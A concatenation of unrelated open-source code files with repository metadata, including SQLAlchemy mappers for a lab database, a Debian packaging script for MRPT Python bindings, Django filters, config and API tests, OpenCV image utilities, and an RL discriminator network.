    experimentmetadatatype.create_mapper(tables['experiment_metadata_type'])
    experimentmetadata.create_mapper(tables['experiment_metadata'],
                                     tables['experiment_metadata_iso_request'])
    experimentjob.create_mapper(job_mapper, tables['new_job'],
                                tables['new_experiment'])
    project.create_mapper(tables['project'])
    subproject.create_mapper(tables['subproject'])
    user.create_mapper(tables['db_user'])
    userpreferences.create_mapper(tables['user_preferences'])
    # --- ISOs, ISO requests, stock racks and ISO plates --------------------
    iso_request_mapper = isorequest.create_mapper(tables['iso_request'],
        tables['worklist_series_iso_request'],
        tables['iso_request_pool_set'])
    labisorequest.create_mapper(iso_request_mapper, tables['lab_iso_request'],
        tables['experiment_metadata_iso_request'],
        tables['reservoir_specs'],
        tables['molecule_design_library_lab_iso_request'])
    stocksamplecreationisorequest.create_mapper(iso_request_mapper,
        tables['stock_sample_creation_iso_request'],
        tables['molecule_design_library_creation_iso_request'],
        tables['molecule_design_library'])
    iso_mapper = iso.create_mapper(tables['iso'], tables['new_job'],
        tables['iso_job_member'], tables['iso_pool_set'])
    labiso.create_mapper(iso_mapper, tables['iso'],
                         tables['lab_iso_library_plate'])
    stocksamplecreationiso.create_mapper(iso_mapper,
        tables['stock_sample_creation_iso'])
    isojob.create_mapper(job_mapper, tables['iso_job'],
                         tables['iso_job_member'],
                         tables['worklist_series_iso_job'])
    isojobpreparationplate.create_mapper(tables['iso_job_preparation_plate'])
    stock_rack_mapper = stockrack.create_mapper(tables['stock_rack'])
    isojobstockrack.create_mapper(stock_rack_mapper,
                                  tables['iso_job_stock_rack'])
    isostockrack.create_mapper(stock_rack_mapper, tables['iso_stock_rack'])
    isosectorstockrack.create_mapper(stock_rack_mapper,
                                     tables['iso_sector_stock_rack'])
    iso_plate_mapper = isoplate.create_mapper(tables['iso_plate'])
    isoaliquotplate.create_mapper(iso_plate_mapper,
                                  tables['iso_aliquot_plate'])
    isopreparationplate.create_mapper(iso_plate_mapper,
                                      tables['iso_preparation_plate'])
    isosectorpreparationplate.create_mapper(iso_plate_mapper,
        tables['iso_sector_preparation_plate'])
    # --- liquid transfers, worklists and tube transfers --------------------
    pipettingspecs.create_mapper(tables['pipetting_specs'])
    reservoirspecs.create_mapper(tables['reservoir_specs'])
    planned_liquid_transfer_mapper = plannedliquidtransfer.create_mapper(
        tables['planned_liquid_transfer'])
    plannedsampledilution.create_mapper(planned_liquid_transfer_mapper,
        tables['planned_sample_dilution'], tables['rack_position'])
    plannedsampletransfer.create_mapper(planned_liquid_transfer_mapper,
        tables['planned_sample_transfer'], tables['rack_position'])
    plannedracksampletransfer.create_mapper(planned_liquid_transfer_mapper,
        tables['planned_rack_sample_transfer'])
    plannedworklist.create_mapper(tables['planned_worklist'],
                                  tables['planned_liquid_transfer'],
                                  tables['planned_worklist_member'])
    worklistseries.create_mapper(tables['worklist_series'])
    worklistseriesmember.create_mapper(tables['worklist_series_member'])
    executed_liquid_transfer_mapper = executedliquidtransfer.create_mapper(
        tables['executed_liquid_transfer'])
    executedsampledilution.create_mapper(executed_liquid_transfer_mapper,
        tables['executed_sample_dilution'], tables['container'])
    executedsampletransfer.create_mapper(executed_liquid_transfer_mapper,
        tables['executed_sample_transfer'], tables['container'])
    executedracksampletransfer.create_mapper(executed_liquid_transfer_mapper,
        tables['executed_rack_sample_transfer'], tables['rack'])
    executedworklist.create_mapper(tables['executed_worklist'],
                                   tables['executed_liquid_transfer'],
                                   tables['executed_worklist_member'])
    tubetransfer.create_mapper(tables['tube_transfer'], tables['rack'],
                               tables['rack_position'])
    tubetransferworklist.create_mapper(tables['tube_transfer_worklist'],
                                       tables['tube_transfer'],
                                       tables['tube_transfer_worklist_member'],
                                       tables['db_user'])
| 59.239394
| 79
| 0.705765
|
4a07bb4334769c21fc325a37522548e1626d2d04
| 231
|
py
|
Python
|
caffshop/webshop/filters.py
|
Jezus-es-a-haverok/CaffShop
|
222f9945e77228ecc8fa73c9bb4fad8799af0825
|
[
"MIT"
] | null | null | null |
caffshop/webshop/filters.py
|
Jezus-es-a-haverok/CaffShop
|
222f9945e77228ecc8fa73c9bb4fad8799af0825
|
[
"MIT"
] | null | null | null |
caffshop/webshop/filters.py
|
Jezus-es-a-haverok/CaffShop
|
222f9945e77228ecc8fa73c9bb4fad8799af0825
|
[
"MIT"
] | null | null | null |
import django_filters
from .models import CAFF
class CAFFFilter(django_filters.FilterSet):
    # Filter set for CAFF listings: case-insensitive substring match
    # (Django's `icontains` lookup) on the creator and name fields.
    class Meta:
        model = CAFF
        fields = {
            'creator': ['icontains'],
            'name': ['icontains'],
        }
| 21
| 43
| 0.5671
|
4a07bb47dd2f03440f474b08d1d2d90cac942e8f
| 7,182
|
py
|
Python
|
python/prepare_debian.py
|
zarmomin/mrpt
|
1baff7cf8ec9fd23e1a72714553bcbd88c201966
|
[
"BSD-3-Clause"
] | 1
|
2020-02-01T15:43:00.000Z
|
2020-02-01T15:43:00.000Z
|
python/prepare_debian.py
|
gao-ouyang/mrpt
|
4af5fdf7e45b00be4a64c3d4f009acb9ef415ec7
|
[
"BSD-3-Clause"
] | 1
|
2017-11-30T19:51:29.000Z
|
2018-02-01T08:15:36.000Z
|
python/prepare_debian.py
|
gao-ouyang/mrpt
|
4af5fdf7e45b00be4a64c3d4f009acb9ef415ec7
|
[
"BSD-3-Clause"
] | 2
|
2017-01-12T02:08:10.000Z
|
2018-02-14T23:05:10.000Z
|
#!/usr/bin/env python
import argparse
import os
import platform
import sys
import shutil
import subprocess
DEFAULT_MRPT_VERSION = '1:1.3.0-1'  # used when -m/--mrpt_version is not given
# args
# Command line: optional build dir (defaults to ../build relative to this
# script), the MRPT version string for the package metadata, and the
# mandatory target Debian architecture.
parser = argparse.ArgumentParser()
parser.add_argument('-b', '--build_dir', help='Path to the build directory.')
parser.add_argument('-m', '--mrpt_version', help='The MRPT lib version those bindings are generated from. DEFAULT: {}'.format(DEFAULT_MRPT_VERSION))
parser.add_argument('-a', '--architecture', required=True, help='The architecture the bindings are built for (i386, amd, armhf, etc.).')
args = parser.parse_args()
def check_required_program(program):
    """Exit with status 1 if *program* cannot be found on PATH.

    Bug fix: ``subprocess.call`` does not raise when 'which' finds
    nothing -- a missing program is reported through a non-zero exit
    status, so the original try/except never detected anything. Check
    the returned status instead; OSError (no 'which' binary at all) is
    treated the same as "not found".
    """
    try:
        status = subprocess.call(['which', program])
    except OSError:
        # 'which' itself is unavailable; treat the program as missing.
        status = 1
    if status != 0:
        print('Required program "{}" not found.'.format(program))
        sys.exit(1)
print 'Looking for required programs:'
check_required_program('sudo')
check_required_program('dpkg')
check_required_program('chrpath')
check_required_program('lintian')
# get supplied build path, otherwise set default
if args.build_dir:
build_dir = args.build_dir
else:
build_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'build')
# save current dir
curr_dir = str(os.path.abspath(os.path.curdir))
# find pymrpt.so in build dir
built_lib = os.path.join(build_dir, 'lib', 'pymrpt.so')
if os.path.exists(os.path.join(built_lib)):
print 'Found local build: "{}".'.format(built_lib)
else:
print 'Could not find "pymrpt.so" in {}. Supply path to build directory as argument!'.format(build_dir)
print 'Example: {} <path/to/build>'.format(sys.argv[0])
print '\nExit.'
sys.exit(1)
# TODO find version automatically
built_lib_version = args.mrpt_version if args.mrpt_version else DEFAULT_MRPT_VERSION
built_lib_size = os.path.getsize(built_lib)
built_lib_arch = args.architecture
# user home
home_dir = os.path.expanduser('~')
# packaging dir
pkg_dir = os.path.join(home_dir, 'mrpt-python-bindings')
# check if packaging dir exists
if os.path.exists(pkg_dir):
cont = raw_input('Packaging dir already exists. Continue anyway? (y/N): ')
if cont != 'y':
print '\nExit.'
sys.exit(0)
# remove existing dir (utilizing sudo)
try:
command = 'rm -rf {}'.format(pkg_dir)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
except:
raise
print 'Removed existing packaging dir.'
print 'Preparing:'
print '========='
# create packaging directory
os.mkdir(pkg_dir)
print 'Created packaging dir: "{}".'.format(pkg_dir)
# create DEBIAN directory
deb_dir = os.path.join(pkg_dir, 'DEBIAN')
os.mkdir(deb_dir)
print 'Created DEBIAN dir: "{}".'.format(deb_dir)
# create install directory (utilizing sudo)
inst_dir = os.path.join(pkg_dir, 'usr', 'lib', 'python2.7', 'dist-packages')
try:
command = 'mkdir -p {}'.format(inst_dir)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
except:
raise
print 'Created install dir: "{}".'.format(inst_dir)
# copy local built pymrpt.so to install dir (utilizing sudo)
command = 'cp {} {}'.format(built_lib, inst_dir)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
print 'Copied library file: "{}" to "{}".'.format(built_lib, inst_dir)
# change file permissions
inst_so = os.path.join(inst_dir, 'pymrpt.so')
command = 'chmod 0644 {}'.format(inst_so)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
print 'Changed "{}" permissions to: 0644.'.format(inst_so)
# remove rpath from shared lib
command = 'chrpath -d {}'.format(inst_so)
subprocess.call(["/usr/bin/sudo", "sh", "-c", command])
print 'Removed RPATH from "{}".'.format(inst_so)
# create control file
control_content = [
'Package: mrpt-python-bindings',
'Version: {}'.format(built_lib_version),
'Architecture: {}'.format(built_lib_arch),
'Maintainer: Peter Rudolph <semael23@gmail.com>',
'Installed-Size: {}'.format(built_lib_size),
'Depends: libmrpt-base1.3, libmrpt-slam1.3, libmrpt-obs1.3, libmrpt-maps1.3, libmrpt-nav1.3, libmrpt-opengl1.3, libmrpt-gui1.3, libboost-python1.54, libc6',
'Section: devel',
'Priority: optional',
'Homepage: https://www.mrpt.org',
'Description: MRPT python bindings.',
' This package contains the python bindings for',
' the Mobile Robot Programming Toolkit (MRPT).',
'' # final new line
]
control_filename = os.path.join(pkg_dir, 'DEBIAN', 'control')
control_file = open(control_filename, 'w+')
control_file.write('\n'.join(control_content))
control_file.close()
print 'Created control file: "{}".'.format(control_filename)
# create copyright file
copyright_content = [
'Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/',
'Upstream-Name: mrpt-python-bindings',
'Upstream-Contact: Peter Rudolph <semael23@gmail.com>',
'Source: https://github.com/MRPT/mrpt',
'',
'Files: *',
'Copyright: 2014-2015 Peter Rudolph',
'License: Expat',
'',
'License: Expat',
' Permission is hereby granted, free of charge, to any person obtaining a copy',
' of this software and associated documentation files (the "Software"), to deal',
' in the Software without restriction, including without limitation the rights',
' to use, copy, modify, merge, publish, distribute, sublicense, and/or sell',
' copies of the Software, and to permit persons to whom the Software is',
' furnished to do so, subject to the following conditions:',
' ',
' The above copyright notice and this permission notice shall be included in',
' all copies or substantial portions of the Software.',
' ',
' THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR',
' IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,',
' FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE',
' AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER',
' LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,',
' OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN',
' THE SOFTWARE.',
'',
]
copyright_filename = os.path.join(pkg_dir, 'DEBIAN', 'copyright')
copyright_file = open(copyright_filename, 'w+')
copyright_file.write('\n'.join(copyright_content))
copyright_file.close()
print 'Created copyright file: "{}".'.format(copyright_filename)
# TODO use auto-generated changelog
changelog_content = [
'python-mrpt-bindings ({}) unstable; urgency=low'.format(built_lib_version),
'',
' * Initial Release.',
'',
' -- Peter Rudolph <semael23@gmail.com> Tue, 20 Jan 2015 12:30:54 +0100',
'',
]
changelog_filename = os.path.join(pkg_dir, 'DEBIAN', 'changelog')
changelog_file = open(changelog_filename, 'w+')
changelog_file.write('\n'.join(changelog_content))
changelog_file.close()
print 'Created changelog file: "{}".'.format(changelog_filename)
os.chdir(home_dir)
# build the package
print 'Build package:'
subprocess.call(['dpkg', '-b', 'mrpt-python-bindings'])
# check package with lintian
print 'Check package:'
subprocess.call(['lintian', os.path.join(home_dir, 'mrpt-python-bindings.deb')])
# go to initial dir
os.chdir(curr_dir)
print 'Done.'
| 35.205882
| 160
| 0.699248
|
4a07bbb5556699727833cc32456b99614745a791
| 509
|
py
|
Python
|
src/software/backend/backend/asgi.py
|
ObaraEmmanuel/votingBooth
|
53cc59e617e0d2b47fbefb48f6e5a096c74f1ad9
|
[
"MIT"
] | 2
|
2021-06-06T05:07:34.000Z
|
2021-08-30T08:56:41.000Z
|
src/software/backend/backend/asgi.py
|
bytecod3/votingBooth
|
6a248833b34885a1d6b62b5d1ee7a60baba769e9
|
[
"MIT"
] | 44
|
2021-05-24T18:43:56.000Z
|
2021-07-29T21:05:02.000Z
|
src/software/backend/backend/asgi.py
|
bytecod3/votingBooth
|
6a248833b34885a1d6b62b5d1ee7a60baba769e9
|
[
"MIT"
] | 3
|
2021-06-05T19:53:32.000Z
|
2021-06-11T11:29:22.000Z
|
"""
ASGI config for backend project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
import dotenv
dotenv.load_dotenv(
os.path.join(os.path.dirname(os.path.dirname(__file__)), '.env')
)
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings.production')
application = get_asgi_application()
| 22.130435
| 78
| 0.772102
|
4a07bc300b1d414ac6853b49f920c7bce7cf1d34
| 667
|
py
|
Python
|
app/news.py
|
farzana583/News-API
|
68744239399e79bcd1fceb9d58e825982b359dbd
|
[
"Unlicense"
] | 1
|
2022-03-15T17:01:58.000Z
|
2022-03-15T17:01:58.000Z
|
app/news.py
|
farzana583/News-API
|
68744239399e79bcd1fceb9d58e825982b359dbd
|
[
"Unlicense"
] | null | null | null |
app/news.py
|
farzana583/News-API
|
68744239399e79bcd1fceb9d58e825982b359dbd
|
[
"Unlicense"
] | null | null | null |
class News:
    """Plain data holder describing a single news source.

    Carries the source's identifier, display name, description, homepage
    URL, content category, and country code, exactly as supplied.
    """

    def __init__(self, id, name, description, url, category, country):
        # Store every constructor argument verbatim on the instance.
        self.id, self.name = id, name
        self.description, self.url = description, url
        self.category, self.country = category, country
class NewsArticle:
    """Plain data holder describing a single news article.

    Mirrors the article fields returned by the news service: identifier,
    author, title, description, URL, image URL, publication timestamp,
    and body content.
    """

    def __init__(self, id, author, title, description, url, urlToImage, publishedAt, content):
        # Assign each field in declaration order via a single loop.
        for attr_name, attr_value in (
            ('id', id),
            ('author', author),
            ('title', title),
            ('description', description),
            ('url', url),
            ('urlToImage', urlToImage),
            ('publishedAt', publishedAt),
            ('content', content),
        ):
            setattr(self, attr_name, attr_value)
| 29
| 86
| 0.626687
|
4a07bc91545eb2001c7957ac2bdf1058054766e3
| 6,731
|
py
|
Python
|
util/image_comp_tool.py
|
deay0ung/HalloPy
|
652902ed95627496d280eb48f0cef8dade76701d
|
[
"MIT"
] | 60
|
2018-09-01T08:27:32.000Z
|
2022-03-09T21:42:54.000Z
|
util/image_comp_tool.py
|
deay0ung/HalloPy
|
652902ed95627496d280eb48f0cef8dade76701d
|
[
"MIT"
] | 3
|
2019-06-15T10:08:25.000Z
|
2020-04-13T16:34:24.000Z
|
util/image_comp_tool.py
|
deay0ung/HalloPy
|
652902ed95627496d280eb48f0cef8dade76701d
|
[
"MIT"
] | 24
|
2018-09-01T08:27:49.000Z
|
2021-06-15T00:14:04.000Z
|
# import the necessary packages
from skimage.measure import compare_ssim
import numpy as np
import cv2
from hallopy import utils
class ImageTestTool:
    """Static image-processing helpers used by the tests.

    Covers structural image comparison (SSIM), face detection and
    masking, ROI clipping, and contour extraction/annotation, built on
    OpenCV and scikit-image.
    """

    @staticmethod
    def compare_imaged(img1, img2):
        """Compare two BGR images structurally.

        Returns the SSIM score in [-1, 1]; a value of 1 means a perfect
        match.
        """
        grayA = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
        grayB = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
        # full=True also yields the per-pixel difference image (unused here).
        (score, diff) = compare_ssim(grayA, grayB, full=True)
        return score

    @staticmethod
    def detect_faces(img):
        """Detect faces in a BGR image.

        Returns an array of (x, y, w, h) bounding boxes, one per face.
        """
        face_detector = cv2.CascadeClassifier(
            utils.get_full_path('hallopy/config/haarcascade_frontalface_default.xml'))
        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        return face_detector.detectMultiScale(gray, 1.3, 5)

    @staticmethod
    def draw_black_recs(img, obj_coord):
        """Black out each (x, y, w, h) rectangle in *img*, in place.

        Used to cover detected faces so skin tones there do not add noise.
        """
        for (x, y, w, h) in obj_coord:
            img[y:y + h, x:x + w, :] = 0

    @staticmethod
    def clip_roi(img, roi):
        """Return the configured capture region of interest of *img*.

        *roi* maps 'cap_region_y_end' and 'cap_region_x_begin' to
        fractions of the image height and width respectively.
        """
        clipped = img[0:int(roi['cap_region_y_end'] * img.shape[0]),
                      int(roi['cap_region_x_begin'] * img.shape[1]):img.shape[1]]
        return clipped

    @staticmethod
    def get_max_area_contour(input_image):
        """Return the largest-area contour of *input_image*.

        Returns None when no contour is found or extraction fails.
        """
        expected_gray = cv2.cvtColor(input_image, cv2.COLOR_BGR2GRAY)
        blur = cv2.GaussianBlur(expected_gray, (41, 41), 0)
        thresh = cv2.threshold(blur, 50, 255, cv2.THRESH_BINARY)[1]
        # Erode then dilate to drop small speckles before the contour search.
        thresh = cv2.erode(thresh, None, iterations=2)
        thresh = cv2.dilate(thresh, None, iterations=2)
        # NOTE(review): 3-value unpacking assumes OpenCV 3.x findContours;
        # OpenCV 4 returns only (contours, hierarchy).
        _, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
        try:
            if len(contours) > 0:
                return max(contours, key=cv2.contourArea)
        except ValueError as error:
            print(error)

    @staticmethod
    def get_contour_area(contour):
        """Return the area enclosed by *contour*."""
        return cv2.contourArea(contour)

    @staticmethod
    def get_center_of_mass(contour):
        """Return the contour's center of mass as (cX, cY).

        Falls back to (0, 0) when the contour has zero area (m00 == 0).
        """
        M = cv2.moments(contour)
        if M["m00"] != 0:
            cX = int(M["m10"] / M["m00"])
            cY = int(M["m01"] / M["m00"])
        else:
            cX, cY = 0, 0
        return cX, cY

    @staticmethod
    def get_middle_finger_edge_coord(contour):
        """Return the (x, y) of the topmost (smallest-y) contour point.

        Bug fix: the original only tracked the minimum y value and then
        returned the coordinates of the *last* point visited by the loop,
        not the topmost one. We now track the point itself. Returns None
        for an empty contour.
        """
        top_point = None
        top_y = 1000  # sentinel larger than any expected image height
        for point in contour:
            if point[0][1] < top_y:
                top_y = point[0][1]
                top_point = (point[0][0], point[0][1])
        return top_point

    @staticmethod
    def get_contour_extreme_points(contour):
        """Return the (left, right, top, bottom) extreme points of *contour*.

        Each element is an (x, y) tuple; all four are (0, 0) when
        *contour* is not an indexable array (e.g. None).
        """
        c = contour
        try:
            extLeft = tuple(c[c[:, :, 0].argmin()][0])
            extRight = tuple(c[c[:, :, 0].argmax()][0])
            extTop = tuple(c[c[:, :, 1].argmin()][0])
            extBot = tuple(c[c[:, :, 1].argmax()][0])
        except TypeError:
            extLeft = 0, 0
            extRight = 0, 0
            extTop = 0, 0
            extBot = 0, 0
        return extLeft, extRight, extTop, extBot

    @staticmethod
    def draw_contours(image, contours):
        """Draw *contours* onto *image* in yellow, in place."""
        cv2.drawContours(image, [contours], -1, (0, 255, 255), 2)

    @staticmethod
    def draw_tracking_points(image, points):
        """Annotate the topmost and bottommost tracking points on *image*.

        *points* is an array of (x, y) coordinates; nothing is drawn when
        it is empty. Top-most is marked blue, bottom-most teal, matching
        the original annotation scheme.
        """
        c = points.reshape(-1, 1, 2)
        if points.size > 0:
            ext_top = tuple(c[c[:, :, 1].argmin()][0])
            ext_bot = tuple(c[c[:, :, 1].argmax()][0])
            cv2.circle(image, ext_top, 8, (255, 0, 0), -1)
            cv2.putText(image, 'ext_top', ext_top, cv2.FONT_HERSHEY_COMPLEX, .5, (255, 0, 0))
            cv2.circle(image, ext_bot, 8, (255, 255, 0), -1)
            cv2.putText(image, 'ext_bot', ext_bot, cv2.FONT_HERSHEY_COMPLEX, .5, (255, 255, 0))
| 38.244318
| 120
| 0.576883
|
4a07bc9f90286e676d31f9f9a9fb46259f679a93
| 726
|
py
|
Python
|
alipay/aop/api/response/AlipayInsMarketingLifeAccessQueryResponse.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/response/AlipayInsMarketingLifeAccessQueryResponse.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
alipay/aop/api/response/AlipayInsMarketingLifeAccessQueryResponse.py
|
articuly/alipay-sdk-python-all
|
0259cd28eca0f219b97dac7f41c2458441d5e7a6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayInsMarketingLifeAccessQueryResponse(AlipayResponse):
    """Response wrapper for the alipay.ins.marketing.life.access.query API.

    Exposes a single business field, ``access``, lifted out of the parsed
    gateway response.
    """

    def __init__(self):
        super(AlipayInsMarketingLifeAccessQueryResponse, self).__init__()
        # Raw 'access' payload from the gateway; set by parse_response_content.
        self._access = None

    @property
    def access(self):
        return self._access

    @access.setter
    def access(self, value):
        self._access = value

    def parse_response_content(self, response_content):
        # Let the base class parse the response envelope, then copy the
        # business field onto this object when present.
        response = super(AlipayInsMarketingLifeAccessQueryResponse, self).parse_response_content(response_content)
        if 'access' in response:
            self.access = response['access']
| 27.923077
| 114
| 0.716253
|
4a07bcf7df785e31db1ee115a62ea9309efb4207
| 2,479
|
py
|
Python
|
rlkit/torch/url/discriminator.py
|
hsukyle/rlkit
|
613eaa1a634dd08996557cff966d3be2fa8f78a3
|
[
"MIT"
] | null | null | null |
rlkit/torch/url/discriminator.py
|
hsukyle/rlkit
|
613eaa1a634dd08996557cff966d3be2fa8f78a3
|
[
"MIT"
] | null | null | null |
rlkit/torch/url/discriminator.py
|
hsukyle/rlkit
|
613eaa1a634dd08996557cff966d3be2fa8f78a3
|
[
"MIT"
] | 1
|
2020-10-22T05:05:48.000Z
|
2020-10-22T05:05:48.000Z
|
from rlkit.torch.networks import Mlp
from torch.optim import Adam
import torch.nn as nn
from rlkit.torch.torch_rl_algorithm import np_to_pytorch_batch
from rlkit.util.meter import AverageMeter
from rlkit.torch import pytorch_util as ptu
import torch
from tqdm import tqdm
class Discriminator(Mlp):
    """MLP classifier trained to predict a discrete context label from an
    observation.

    NOTE(review): labels are taken from ``batch['context']`` and trained
    with cross-entropy -- presumably a skill id in [0, num_skills); confirm
    against the replay buffer's contents.
    """

    def __init__(
            self,
            *args,
            batch_size=256,
            num_batches_per_fit=50,
            num_skills=20,
            sampling_strategy='random',
            sampling_window=10,
            lr=3e-4,
            **kwargs
    ):
        # save_init_params records the constructor args (rlkit serialization
        # convention) so the module can be re-instantiated later.
        self.save_init_params(locals())
        super().__init__(*args, **kwargs)
        self.num_skills = num_skills
        self.batch_size = batch_size
        self.num_batches_per_fit = num_batches_per_fit
        # 'random' samples uniformly from the whole buffer; 'recent'
        # restricts sampling to the last `sampling_window` entries.
        self.sampling_strategy = sampling_strategy
        self.sampling_window = sampling_window
        self.optimizer = Adam(self.parameters(), lr=lr)
        # NOTE(review): reduction='elementwise_mean' is the pre-1.0 PyTorch
        # spelling of 'mean'; deprecated in newer releases.
        self.loss_function_mean = nn.CrossEntropyLoss(reduction='elementwise_mean')
        # Per-element (unreduced) loss, used by evaluate_cross_entropy.
        self.loss_function = nn.CrossEntropyLoss(reduction='none')
        self.loss_meter = AverageMeter()

    def fit(self, replay_buffer):
        """Run `num_batches_per_fit` optimizer steps on batches drawn from
        *replay_buffer*; returns the average training loss over the fit.

        Leaves the module in eval mode on return.
        """
        self.train()
        self.loss_meter.reset()
        # t = tqdm(range(self.num_batches_per_fit))
        t = range(self.num_batches_per_fit)
        for i in t:
            if self.sampling_strategy == 'random':
                batch = replay_buffer.random_batch(self.batch_size)
            elif self.sampling_strategy == 'recent':
                batch = replay_buffer.recent_batch(self.batch_size, self.sampling_window)
            else:
                raise ValueError
            batch = np_to_pytorch_batch(batch)
            inputs = batch['observations']
            labels = batch['context'].long()
            self.optimizer.zero_grad()
            outputs = self.forward(inputs)
            # Labels arrive with a trailing singleton dim; squeeze to (N,).
            loss = self.loss_function_mean(outputs, labels.squeeze(1))
            loss.backward()
            self.optimizer.step()
            self.loss_meter.update(val=loss.item(), n=self.batch_size)
            # print(self.loss_meter.avg)
        self.eval()
        return self.loss_meter.avg

    def evaluate_cross_entropy(self, inputs, labels):
        """Return per-sample cross-entropy for numpy *inputs*/*labels*.

        Result is a numpy array with a trailing singleton dimension
        (shape (N, 1)); no gradients are tracked.
        """
        with torch.no_grad():
            inputs = ptu.from_numpy(inputs)
            labels = ptu.from_numpy(labels).long()
            logits = self.forward(inputs)
            return ptu.get_numpy(self.loss_function(logits, labels.squeeze(1)).unsqueeze(1))
| 34.430556
| 92
| 0.626462
|
4a07be561b737d9a7e9e84ec0ef5c73dbbbe8153
| 3,162
|
py
|
Python
|
app/recipe/tests/test_tags_api.py
|
havenvo/recipe-app-api
|
9c489ece49f7ff131549c0caf193afb8cf6a9cbe
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_tags_api.py
|
havenvo/recipe-app-api
|
9c489ece49f7ff131549c0caf193afb8cf6a9cbe
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_tags_api.py
|
havenvo/recipe-app-api
|
9c489ece49f7ff131549c0caf193afb8cf6a9cbe
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
    """Tests for the tags endpoint without authentication."""

    def setUp(self):
        self.client = APIClient()

    def test_login_required(self):
        """Listing tags must be rejected for unauthenticated requests."""
        res = self.client.get(TAGS_URL)
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
    """Tests for the tags endpoint as an authenticated user."""

    def setUp(self):
        # Authenticate every request in this class as a fixed test user.
        self.user = get_user_model().objects.create_user(
            'test@example.com',
            'Test@123'
        )
        self.client = APIClient()
        self.client.force_authenticate(self.user)

    def test_retrieve_tags(self):
        """Listing tags returns them serialized, ordered by name descending."""
        Tag.objects.create(user=self.user, name='Vegan')
        Tag.objects.create(user=self.user, name='Dessert')
        res = self.client.get(TAGS_URL)
        tags = Tag.objects.all().order_by('-name')
        serializer = TagSerializer(tags, many=True)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(res.data, serializer.data)

    def test_limited_to_user(self):
        """Test that tag returns are for the authenticated user"""
        user2 = get_user_model().objects.create_user(
            'other@example.com',
            'Test@123'
        )
        Tag.objects.create(user=user2, name='Fruity')
        tag = Tag.objects.create(user=self.user, name='Comfort Food')
        res = self.client.get(TAGS_URL)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        # Only the authenticated user's single tag should be returned.
        self.assertEqual(len(res.data), 1)
        self.assertEqual(res.data[0]['name'], tag.name)

    def test_filter_tags_already_assigned_to_recipes(self):
        """?assigned_only=1 returns only tags attached to at least one recipe."""
        tag1 = Tag.objects.create(user=self.user, name='Lunch')
        tag2 = Tag.objects.create(user=self.user, name='Dinner')
        recipe = Recipe.objects.create(
            user=self.user,
            title='Chicken Rice',
            time_minutes=20,
            price=10.00
        )
        recipe.tags.add(tag1)
        res = self.client.get(TAGS_URL, {'assigned_only': 1})
        serializer1 = TagSerializer(tag1)
        serializer2 = TagSerializer(tag2)
        self.assertIn(serializer1.data, res.data)
        self.assertNotIn(serializer2.data, res.data)

    def test_retrieve_assigned_return_unique(self):
        """A tag used by multiple recipes appears only once with assigned_only."""
        tag = Tag.objects.create(user=self.user, name='Lunch')
        Tag.objects.create(user=self.user, name='Breakfast')
        recipe1 = Recipe.objects.create(
            user=self.user,
            title='Chicken Rice',
            time_minutes=15,
            price=15.00
        )
        recipe2 = Recipe.objects.create(
            user=self.user,
            title='Fried Potato',
            time_minutes=15,
            price=5.00
        )
        recipe1.tags.add(tag)
        recipe1.refresh_from_db()
        recipe2.tags.add(tag)
        recipe2.refresh_from_db()
        res = self.client.get(TAGS_URL, {'assigned_only': 1})
        self.assertEqual(len(res.data), 1)
| 30.699029
| 71
| 0.63599
|
4a07be9921b5382ead26f715329997afdacaf2ec
| 7,745
|
py
|
Python
|
completed_numberplate/Main.py
|
supersetdashboard/eindopdracht
|
0d2b7f4bd9b132c823dae170dffc85451e8b2171
|
[
"Apache-2.0"
] | null | null | null |
completed_numberplate/Main.py
|
supersetdashboard/eindopdracht
|
0d2b7f4bd9b132c823dae170dffc85451e8b2171
|
[
"Apache-2.0"
] | null | null | null |
completed_numberplate/Main.py
|
supersetdashboard/eindopdracht
|
0d2b7f4bd9b132c823dae170dffc85451e8b2171
|
[
"Apache-2.0"
] | null | null | null |
# Main.py
import cv2
import numpy as np
import os
import DetectChars
import DetectPlates
import PossiblePlate
import xlwt
from xlwt import Workbook
wbr = Workbook()
sheet1 = wbr.add_sheet('Sheet 1')
# module level variables ##########################################################################
